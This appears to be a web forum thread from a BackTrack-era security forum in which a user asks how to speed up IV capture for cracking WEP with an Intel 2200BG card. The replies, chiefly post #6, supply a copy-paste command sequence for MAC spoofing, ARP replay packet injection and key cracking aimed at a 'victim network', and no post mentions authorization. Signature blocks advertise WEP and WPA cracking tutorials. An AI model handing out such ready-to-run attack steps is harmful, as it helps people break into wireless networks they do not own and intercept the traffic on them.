Results 1 to 8 of 8

Thread: Is that possible to have more IV with a "Wireless 2200BG Network Connection"

  1. #1
    Just burned his ISO
    Join Date
    Sep 2007
    Posts
    6

    Default Is that possible to have more IV with a "Wireless 2200BG Network Connection"

    Hello everybody

    I don't receive a lot of IV (40 000 in 1 day...), is that possible to have more iv? I think that it's very slow

    I receive the same number of iv with this command:
    - aireplay-ng --arpreplay -b 00:00:00:00:00:00 -h 11:11:11:11:11:11 -i rtap0 eth1



    Is there another command for my card ?



    Sorry for language, i am french ...

  2. #2
    Senior Member
    Join Date
    Apr 2007
    Posts
    3,385

    Default

    Quote Originally Posted by Esmax666 View Post
    Hello everybody

    I don't receive a lot of IV (40 000 in 1 day...), is that possible to have more iv? I think that it's very slow

    I receive the same number of iv with this command:
    - aireplay-ng --arpreplay -b 00:00:00:00:00:00 -h 11:11:11:11:11:11 -i rtap0 eth1



    Is there another command for my card ?



    Sorry for language, i am french ...
    What the heck is -i rtap0 eth1???

    Please give more detail.

    I/WE need to know your cards name, chipset..if you updated aircrack-ng suite or not...what all the steps you have taken from start to finish are.

    I have a video thats stickied using the -3 (ARPReplay attack) and a video further down using the -4 (korek chopchop attack.) Take a look at them and use them to GUIDE you.

    And yes 40,000 IVS in a day is not very many. I get 40,000 in just a minute or 2.
    [CENTER][FONT=Book Antiqua][SIZE=5][B][COLOR=blue][FONT=Courier New][COLOR=red]--=[/COLOR][/FONT]Xploitz[FONT=Courier New][COLOR=red]=--[/COLOR][/FONT][/COLOR][/B][/SIZE][/FONT][FONT=Courier New][COLOR=Black][SIZE=6][B] ®[/B][/SIZE][/COLOR][/FONT][/CENTER]
    [CENTER][SIZE=4][B]Remote-Exploit.orgs Master Tutorialist.[/B][/SIZE][SIZE=6][B]™
    [/B][/SIZE]
    [URL="http://forums.remote-exploit.org/showthread.php?t=9063"][B]VIDEO: Volume #1 "E-Z No Client WEP Cracking Tutorial"[/B]
    [/URL]
    [URL="http://forums.remote-exploit.org/showthread.php?t=7872"][B]VIDEO: Volume #2 "E-Z No Client Korek Chopchop Attack Tutorial"[/B]
    [/URL]
    [URL="http://forums.remote-exploit.org/showthread.php?t=8230"][B]VIDEO: Volume #3 "E-Z WPA/WPA2 Cracking Tutorial"[/B][/URL]

    [URL="http://forums.remote-exploit.org/showthread.php?t=8041"][B]VIDEO: Volume #4 "E-Z Cracking WPA/WPA2 With Airolib-ng Databases"[/B][/URL]
    [/CENTER]

  3. #3
    Senior Member shamanvirtuel's Avatar
    Join Date
    Mar 2010
    Location
    Somewhere in the "Ex" human right country
    Posts
    2,988

    Default

    rtap0 is like ath0 for an atheros card
    it's a VAP

    BUT
    if you updated to last dev of 1.0 (rev 711) you won't need to use -i rtap0 anymore
    you just use eth1 (the parent card)

    it's a quite new support in aircrack and you must test it........

    here is the comment for this revision :

    Added better ipw2200 support. The interface is set to managed mode automatically, an rtapX interface is created, it will listen on that and it opens the sysfs file for injection. so you just specify the ethX interface on air* and it will work. no need to specify -i rtapX anymore. "airodump-ng -c X eth1" "aireplay-ng -3 eth1".

    i bet it may help you.......
    Watch your back, your packetz will belong to me soon... xD

    BackTrack :
    Giving Machine Guns to Monkeys since 2006

  4. #4
    Senior Member
    Join Date
    Apr 2007
    Posts
    3,385

    Default

    Thanks Niko for explaining. I got confused for a minute. It looked like to me that he was using 2 different devices (cards) on the same command line..lol
    [CENTER][FONT=Book Antiqua][SIZE=5][B][COLOR=blue][FONT=Courier New][COLOR=red]--=[/COLOR][/FONT]Xploitz[FONT=Courier New][COLOR=red]=--[/COLOR][/FONT][/COLOR][/B][/SIZE][/FONT][FONT=Courier New][COLOR=Black][SIZE=6][B] ®[/B][/SIZE][/COLOR][/FONT][/CENTER]
    [CENTER][SIZE=4][B]Remote-Exploit.orgs Master Tutorialist.[/B][/SIZE][SIZE=6][B]™
    [/B][/SIZE]
    [URL="http://forums.remote-exploit.org/showthread.php?t=9063"][B]VIDEO: Volume #1 "E-Z No Client WEP Cracking Tutorial"[/B]
    [/URL]
    [URL="http://forums.remote-exploit.org/showthread.php?t=7872"][B]VIDEO: Volume #2 "E-Z No Client Korek Chopchop Attack Tutorial"[/B]
    [/URL]
    [URL="http://forums.remote-exploit.org/showthread.php?t=8230"][B]VIDEO: Volume #3 "E-Z WPA/WPA2 Cracking Tutorial"[/B][/URL]

    [URL="http://forums.remote-exploit.org/showthread.php?t=8041"][B]VIDEO: Volume #4 "E-Z Cracking WPA/WPA2 With Airolib-ng Databases"[/B][/URL]
    [/CENTER]

  5. #5
    Just burned his ISO
    Join Date
    Sep 2007
    Posts
    6

    Default

    thank you for your replies

    I have a "Intel(R) PRO/Wireless 2200BG Network Connection" with backtrack 2

    Is that possible to do some attack with m card ?


    My command:

    rmmod ipw2200
    modprobe ipw2200 rtap_iface=1
    ifconfig eth1 up
    ifconfig rtap0 up
    airodump-ng eth1
    (I see the station and ssid)

    ifconfig eth1 down

    ifconfig eth1 hw ether (left column)

    ifconfig eth1 up


    airodump-ng --channel 11 -w out --ivs eth1

    aireplay-ng --arpreplay -b (left column) -h (right column) -i rtap0 eth1
    aircrack-ng out.ivs

    is that correct?

    is that better ? aireplay-ng --arpreplay -b (left column) -h (right column) eth1 (without "-i rtap0")

  6. #6
    Senior Member shamanvirtuel's Avatar
    Join Date
    Mar 2010
    Location
    Somewhere in the "Ex" human right country
    Posts
    2,988

    Default

    modprobe ipw2200 rtap_iface=0

    the rtap0 will created in bg and sysf open for injection........

    as aircrack create it you don't need to create one

    test this way :
    i create 2 variables APMAC & CLIENTMAC with the ap & station macs(just need to put your attack specs)
    you forgot to lock card on channel 11, i added it
    and the right name is out-01.ivs ....-02.ivs ect so i add a wildcard in the command so aircrack will look for all files begining by out...
    i add the -b switch because it filters the outxxx.ivs file and work with only the victim network.....

    just set the macs in the 2 first lines and you can copy paste it i think

    CLIENTMAC=00:11:22:33:44:55
    APMAC=AA:BB:CCD:EE:FF
    rmmod ipw2200
    modprobe ipw2200 rtap_iface=0
    ifconfig eth1 down
    macchanger --mac $CLIENTMAC eth1
    ifconfig eth1 up && iwconfig eth1 channel 11
    airodump-ng --ivs --channel 11 -w out eth1
    aireplay-ng --arpreplay -b $APMAC -h $CLIENTMAC eth1
    aircrack-ng -b $APMAC out*.ivs

    hope helps

    THIS WILL WORK ONLY WITH LAST REVISION OF DEVELOPMENTAL VERSION OF AIRCRACK........
    Watch your back, your packetz will belong to me soon... xD

    BackTrack :
    Giving Machine Guns to Monkeys since 2006

  7. #7
    Just burned his ISO
    Join Date
    Sep 2007
    Posts
    6

    Default

    thank you
    I have the last version of backtrack but i don't know if he has the last version of aircrack

    Is there other command for may card? (to increase my number of iv)

  8. #8
    Just burned his ISO
    Join Date
    Sep 2007
    Posts
    6

    Default

    Somebody know how to do a "fake auth" and/or generate a traffic with a "Wireless 2200BG"

    Thank you

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •